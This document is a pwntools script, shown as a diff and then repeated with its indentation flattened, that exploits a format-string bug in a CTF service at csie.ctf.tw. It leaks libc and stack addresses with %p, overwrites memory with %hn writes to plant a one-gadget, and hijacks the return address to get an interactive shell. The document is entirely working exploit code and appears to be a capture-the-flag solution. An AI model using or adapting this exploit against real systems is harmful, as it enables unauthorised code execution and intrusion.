pccr10001 · December 29, 2017 10:00
diff --git a/fmtfun4u.py b/fmtfun4u.py
 #!/usr/bin/python

 from pwn import *

 context.arch='amd64'

 r = remote('csie.ctf.tw',10136)

 r.recvuntil(':')

 # Leak
 r.send('%p,%3$p,%11$p')
 addrs=r.recvuntil('I').strip()[:-2].split(',')
 text = int(addrs[0],16) - 0x201020
 libc = int(addrs[1],16) - 0x11755c
 bp_chain = int(addrs[2],16)
 rsp = bp_chain - 0x100

 #set value in memory
 def edit(addr, v):
    n = addr & 0xffff
    r.recvuntil(':')
    r.send('%' + str(n) + 'c%11$hn')
    if v == 0:
        v = 65536
    r.recvuntil(':')
    r.send('%' + str(v) + 'c%37$hn')


 i = rsp + 0x8 + 0xc
   
 edit(i,0xffff)

 #one gadget
 gadget=libc+0x4526a
 edit(rsp+0x8,gadget&0xffff)
 edit(rsp+0xA,(gadget>>16)&0xffff)
 edit(rsp+0xC,(gadget>>32)&0xffff)
 edit(rsp+0xE,(gadget>>48)&0xffff)

 #rsp+0x30 = 0
 edit(rsp+0x40,0)
 edit(rsp+0x40+0x2,0)
 edit(rsp+0x40+0x4,0)
 edit(rsp+0x40+0x6,0)

 ret = text+0x7c1
 edit(rsp,ret&0xffff)

 r.interactive()
	#!/usr/bin/python

	from pwn import *

	context.arch='amd64'

	r = remote('csie.ctf.tw',10136)

	r.recvuntil(':')

	# Leak
	r.send('%p,%3$p,%11$p')
	addrs=r.recvuntil('I').strip()[:-2].split(',')
	text = int(addrs[0],16) - 0x201020
	libc = int(addrs[1],16) - 0x11755c
	bp_chain = int(addrs[2],16)
	rsp = bp_chain - 0x100

	#set value in memory
	def edit(addr, v):
	n = addr & 0xffff
	r.recvuntil(':')
	r.send('%' + str(n) + 'c%11$hn')
	if v == 0:
	v = 65536
	r.recvuntil(':')
	r.send('%' + str(v) + 'c%37$hn')


	i = rsp + 0x8 + 0xc

	edit(i,0xffff)

	#one gadget
	gadget=libc+0x4526a
	edit(rsp+0x8,gadget&0xffff)
	edit(rsp+0xA,(gadget>>16)&0xffff)
	edit(rsp+0xC,(gadget>>32)&0xffff)
	edit(rsp+0xE,(gadget>>48)&0xffff)

	#rsp+0x30 = 0
	edit(rsp+0x40,0)
	edit(rsp+0x40+0x2,0)
	edit(rsp+0x40+0x4,0)
	edit(rsp+0x40+0x6,0)

	ret = text+0x7c1
	edit(rsp,ret&0xffff)

	r.interactive()